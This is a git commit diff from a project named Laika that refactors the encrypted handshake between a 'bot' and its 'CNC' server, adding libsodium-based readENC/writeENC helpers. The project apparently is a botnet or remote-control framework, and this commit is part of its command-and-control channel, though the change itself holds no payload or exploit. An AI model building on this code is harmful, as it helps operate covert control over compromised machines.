mirror of
https://github.com/CPunch/Laika.git
synced 2024-11-24 13:31:05 +00:00
Added laikaS_readENC laikaS_writeENC, minor refactoring
This commit is contained in:
parent
8627f5b85d
commit
56c6db1d62
@ -4,7 +4,7 @@
|
|||||||
#include "bot.h"
|
#include "bot.h"
|
||||||
|
|
||||||
LAIKAPKT_SIZE laikaB_pktSizeTbl[LAIKAPKT_MAXNONE] = {
|
LAIKAPKT_SIZE laikaB_pktSizeTbl[LAIKAPKT_MAXNONE] = {
|
||||||
[LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE
|
[LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE)
|
||||||
};
|
};
|
||||||
|
|
||||||
void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
|
void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
|
||||||
@ -12,12 +12,12 @@ void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
|
|||||||
|
|
||||||
switch (id) {
|
switch (id) {
|
||||||
case LAIKAPKT_HANDSHAKE_RES: {
|
case LAIKAPKT_HANDSHAKE_RES: {
|
||||||
uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE];
|
uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)], nonce[LAIKA_NONCESIZE];
|
||||||
uint8_t endianness = laikaS_readByte(&peer->sock);
|
uint8_t endianness = laikaS_readByte(&peer->sock);
|
||||||
|
|
||||||
/* read & decrypt nonce */
|
/* read & decrypt nonce */
|
||||||
laikaS_read(&peer->sock, encNonce, sizeof(encNonce));
|
laikaS_read(&peer->sock, encNonce, sizeof(encNonce));
|
||||||
if (crypto_box_seal_open(nonce, encNonce, crypto_box_SEALBYTES + LAIKA_NONCESIZE, bot->pub, bot->priv) != 0)
|
if (crypto_box_seal_open(nonce, encNonce, LAIKAENC_SIZE(LAIKA_NONCESIZE), bot->pub, bot->priv) != 0)
|
||||||
LAIKA_ERROR("Failed to decrypt nonce!\n");
|
LAIKA_ERROR("Failed to decrypt nonce!\n");
|
||||||
|
|
||||||
/* check nonce */
|
/* check nonce */
|
||||||
@ -57,6 +57,7 @@ struct sLaika_bot *laikaB_newBot(void) {
|
|||||||
LAIKA_ERROR("Failed to gen keypair!\n");
|
LAIKA_ERROR("Failed to gen keypair!\n");
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* read cnc's public key into peerPub */
|
||||||
if (sodium_hex2bin(bot->peer->peerPub, crypto_box_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) {
|
if (sodium_hex2bin(bot->peer->peerPub, crypto_box_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) {
|
||||||
laikaB_freeBot(bot);
|
laikaB_freeBot(bot);
|
||||||
LAIKA_ERROR("Failed to init cnc public key!\n");
|
LAIKA_ERROR("Failed to init cnc public key!\n");
|
||||||
@ -74,7 +75,6 @@ void laikaB_freeBot(struct sLaika_bot *bot) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
|
void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
|
||||||
uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE];
|
|
||||||
struct sLaika_socket *sock = &bot->peer->sock;
|
struct sLaika_socket *sock = &bot->peer->sock;
|
||||||
|
|
||||||
/* setup socket */
|
/* setup socket */
|
||||||
@ -83,16 +83,12 @@ void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
|
|||||||
|
|
||||||
laikaP_addSock(&bot->pList, sock);
|
laikaP_addSock(&bot->pList, sock);
|
||||||
|
|
||||||
/* encrypt nonce using cnc's pubkey */
|
|
||||||
if (crypto_box_seal(encNonce, bot->nonce, sizeof(bot->nonce), bot->peer->peerPub) != 0)
|
|
||||||
LAIKA_ERROR("Failed to enc nonce!\n");
|
|
||||||
|
|
||||||
/* queue handshake request */
|
/* queue handshake request */
|
||||||
laikaS_writeByte(sock, LAIKAPKT_HANDSHAKE_REQ);
|
laikaS_writeByte(sock, LAIKAPKT_HANDSHAKE_REQ);
|
||||||
laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN);
|
laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN);
|
||||||
laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
|
laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
|
||||||
laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
|
laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
|
||||||
laikaS_write(sock, encNonce, sizeof(encNonce)); /* write encrypted nonce test */
|
laikaS_writeENC(sock, bot->nonce, LAIKA_NONCESIZE, bot->peer->peerPub); /* write encrypted nonce test */
|
||||||
laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */
|
laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */
|
||||||
|
|
||||||
if (!laikaS_handlePeerOut(bot->peer))
|
if (!laikaS_handlePeerOut(bot->peer))
|
||||||
|
@ -12,11 +12,11 @@ int main(int argv, char **argc) {
|
|||||||
/* while connection is still alive, poll bot */
|
/* while connection is still alive, poll bot */
|
||||||
while (laikaS_isAlive((&bot->peer->sock))) {
|
while (laikaS_isAlive((&bot->peer->sock))) {
|
||||||
if (!laikaB_poll(bot, 1000)) {
|
if (!laikaB_poll(bot, 1000)) {
|
||||||
printf("no events!\n");
|
LAIKA_DEBUG("no events!\n");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
laikaB_freeBot(bot);
|
laikaB_freeBot(bot);
|
||||||
printf("bot killed\n");
|
LAIKA_DEBUG("bot killed\n");
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
@ -6,7 +6,7 @@
|
|||||||
#include "cnc.h"
|
#include "cnc.h"
|
||||||
|
|
||||||
LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = {
|
LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = {
|
||||||
[LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE + crypto_box_PUBLICKEYBYTES
|
[LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE) + crypto_box_PUBLICKEYBYTES
|
||||||
};
|
};
|
||||||
|
|
||||||
void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
|
void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
|
||||||
@ -15,7 +15,7 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
|
|||||||
switch (id) {
|
switch (id) {
|
||||||
case LAIKAPKT_HANDSHAKE_REQ: {
|
case LAIKAPKT_HANDSHAKE_REQ: {
|
||||||
char magicBuf[LAIKA_MAGICLEN];
|
char magicBuf[LAIKA_MAGICLEN];
|
||||||
uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE];
|
uint8_t nonce[LAIKA_NONCESIZE];
|
||||||
uint8_t major, minor;
|
uint8_t major, minor;
|
||||||
|
|
||||||
laikaS_read(&peer->sock, (void*)magicBuf, LAIKA_MAGICLEN);
|
laikaS_read(&peer->sock, (void*)magicBuf, LAIKA_MAGICLEN);
|
||||||
@ -28,21 +28,15 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
|
|||||||
LAIKA_ERROR("invalid handshake request!\n");
|
LAIKA_ERROR("invalid handshake request!\n");
|
||||||
|
|
||||||
/* read & decrypt nonce */
|
/* read & decrypt nonce */
|
||||||
laikaS_read(&peer->sock, encNonce, sizeof(encNonce));
|
laikaS_readENC(&peer->sock, nonce, LAIKA_NONCESIZE, cnc->pub, cnc->priv);
|
||||||
if (crypto_box_seal_open(nonce, encNonce, sizeof(encNonce), cnc->pub, cnc->priv) != 0)
|
|
||||||
LAIKA_ERROR("Failed to decrypt nonce!\n");
|
|
||||||
|
|
||||||
/* read peer's public key */
|
/* read peer's public key */
|
||||||
laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub));
|
laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub));
|
||||||
|
|
||||||
/* encrypt decrypted nonce with peer's pub key */
|
|
||||||
if (crypto_box_seal(encNonce, nonce, sizeof(nonce), peer->peerPub) != 0)
|
|
||||||
LAIKA_ERROR("Failed to enc nonce!\n");
|
|
||||||
|
|
||||||
/* queue response */
|
/* queue response */
|
||||||
laikaS_writeByte(&peer->sock, LAIKAPKT_HANDSHAKE_RES);
|
laikaS_writeByte(&peer->sock, LAIKAPKT_HANDSHAKE_RES);
|
||||||
laikaS_writeByte(&peer->sock, laikaS_isBigEndian());
|
laikaS_writeByte(&peer->sock, laikaS_isBigEndian());
|
||||||
laikaS_write(&peer->sock, encNonce, sizeof(encNonce));
|
laikaS_writeENC(&peer->sock, nonce, LAIKA_NONCESIZE, peer->peerPub); /* encrypt nonce with peer's public key */
|
||||||
|
|
||||||
LAIKA_DEBUG("accepted handshake from peer %x\n", peer);
|
LAIKA_DEBUG("accepted handshake from peer %x\n", peer);
|
||||||
break;
|
break;
|
||||||
|
@ -14,15 +14,19 @@ enum {
|
|||||||
* uint8_t laikaMagic[LAIKA_MAGICLEN];
|
* uint8_t laikaMagic[LAIKA_MAGICLEN];
|
||||||
* uint8_t majorVer;
|
* uint8_t majorVer;
|
||||||
* uint8_t minorVer;
|
* uint8_t minorVer;
|
||||||
* uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using shared pubKey
|
* uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using shared pubKey
|
||||||
* uint8_t pubKey[crypto_box_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
|
* uint8_t pubKey[crypto_box_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
|
||||||
*/
|
*/
|
||||||
LAIKAPKT_HANDSHAKE_RES,
|
LAIKAPKT_HANDSHAKE_RES,
|
||||||
/* layout of LAIKAPKT_HANDSHAKE_RES:
|
/* layout of LAIKAPKT_HANDSHAKE_RES:
|
||||||
* uint8_t endian;
|
* uint8_t endian;
|
||||||
* uint8_t reEncryptedNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt
|
* uint8_t reEncryptedNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt
|
||||||
*/
|
*/
|
||||||
LAIKAPKT_VARPKT_REQ,
|
LAIKAPKT_VARPKT_REQ,
|
||||||
|
/* layout of LAIKAPKT_VARPKT_REQ:
|
||||||
|
* uint8_t pktID;
|
||||||
|
* uint16_t pktSize;
|
||||||
|
*/
|
||||||
LAIKAPKT_MAXNONE
|
LAIKAPKT_MAXNONE
|
||||||
};
|
};
|
||||||
|
|
||||||
|
@ -3,4 +3,6 @@
|
|||||||
|
|
||||||
#include "sodium.h"
|
#include "sodium.h"
|
||||||
|
|
||||||
|
#define LAIKAENC_SIZE(sz) (sz + crypto_box_SEALBYTES)
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
@ -86,6 +86,8 @@ bool laikaS_setNonBlock(struct sLaika_socket *sock);
|
|||||||
|
|
||||||
void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */
|
void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */
|
||||||
void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */
|
void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */
|
||||||
|
void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub); /* encrypts & writes from buf */
|
||||||
|
void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv); /* decrypts & reads to buf */
|
||||||
void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data);
|
void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data);
|
||||||
uint8_t laikaS_readByte(struct sLaika_socket *sock);
|
uint8_t laikaS_readByte(struct sLaika_socket *sock);
|
||||||
void laikaS_readInt(struct sLaika_socket *sock, void *buf, size_t sz); /* reads INT, respecting endianness */
|
void laikaS_readInt(struct sLaika_socket *sock, void *buf, size_t sz); /* reads INT, respecting endianness */
|
||||||
|
@ -58,9 +58,10 @@ bool laikaS_handlePeerIn(struct sLaika_peer *peer) {
|
|||||||
if (recvd != sizeof(uint8_t) + sizeof(LAIKAPKT_SIZE))
|
if (recvd != sizeof(uint8_t) + sizeof(LAIKAPKT_SIZE))
|
||||||
LAIKA_ERROR("couldn't read whole LAIKAPKT_VARPKT_REQ")
|
LAIKA_ERROR("couldn't read whole LAIKAPKT_VARPKT_REQ")
|
||||||
|
|
||||||
|
/* read pktID */
|
||||||
peer->pktID = laikaS_readByte(&peer->sock);
|
peer->pktID = laikaS_readByte(&peer->sock);
|
||||||
|
|
||||||
/* sanity check packet ID, (check valid range, check it's variadic) */
|
/* sanity check pktID, (check valid range, check it's variadic) */
|
||||||
if (peer->pktID >= LAIKAPKT_MAXNONE || peer->pktSizeTable[peer->pktID])
|
if (peer->pktID >= LAIKAPKT_MAXNONE || peer->pktSizeTable[peer->pktID])
|
||||||
LAIKA_ERROR("received evil pktID!\n")
|
LAIKA_ERROR("received evil pktID!\n")
|
||||||
|
|
||||||
|
@ -3,6 +3,7 @@
|
|||||||
#include "lerror.h"
|
#include "lerror.h"
|
||||||
#include "lmem.h"
|
#include "lmem.h"
|
||||||
#include "lpolllist.h"
|
#include "lpolllist.h"
|
||||||
|
#include "lrsa.h"
|
||||||
#include "lsocket.h"
|
#include "lsocket.h"
|
||||||
|
|
||||||
static int _LNSetup = 0;
|
static int _LNSetup = 0;
|
||||||
@ -184,6 +185,25 @@ void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz) {
|
|||||||
sock->outCount += sz;
|
sock->outCount += sz;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub) {
|
||||||
|
/* make sure we have enough space to encrypt the buffer */
|
||||||
|
laikaM_growarray(uint8_t, sock->outBuf, LAIKAENC_SIZE(sz), sock->outCount, sock->outCap);
|
||||||
|
|
||||||
|
/* encrypt the buffer into outBuf */
|
||||||
|
if (crypto_box_seal(&sock->outBuf[sock->outCount], buf, sz, pub) != 0)
|
||||||
|
LAIKA_ERROR("Failed to encrypt!");
|
||||||
|
|
||||||
|
sock->outCount += LAIKAENC_SIZE(sz);
|
||||||
|
}
|
||||||
|
|
||||||
|
void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv) {
|
||||||
|
/* decrypt into buf */
|
||||||
|
if (crypto_box_seal_open(buf, sock->inBuf, LAIKAENC_SIZE(sz), pub, priv) != 0)
|
||||||
|
LAIKA_ERROR("Failed to decrypt!");
|
||||||
|
|
||||||
|
laikaM_rmvarray(uint8_t, sock->inBuf, sock->inCount, 0, LAIKAENC_SIZE(sz));
|
||||||
|
}
|
||||||
|
|
||||||
void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data) {
|
void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data) {
|
||||||
laikaM_growarray(uint8_t, sock->outBuf, 1, sock->outCount, sock->outCap);
|
laikaM_growarray(uint8_t, sock->outBuf, 1, sock->outCount, sock->outCap);
|
||||||
sock->outBuf[sock->outCount++] = data;
|
sock->outBuf[sock->outCount++] = data;
|
||||||
|
Loading…
Reference in New Issue
Block a user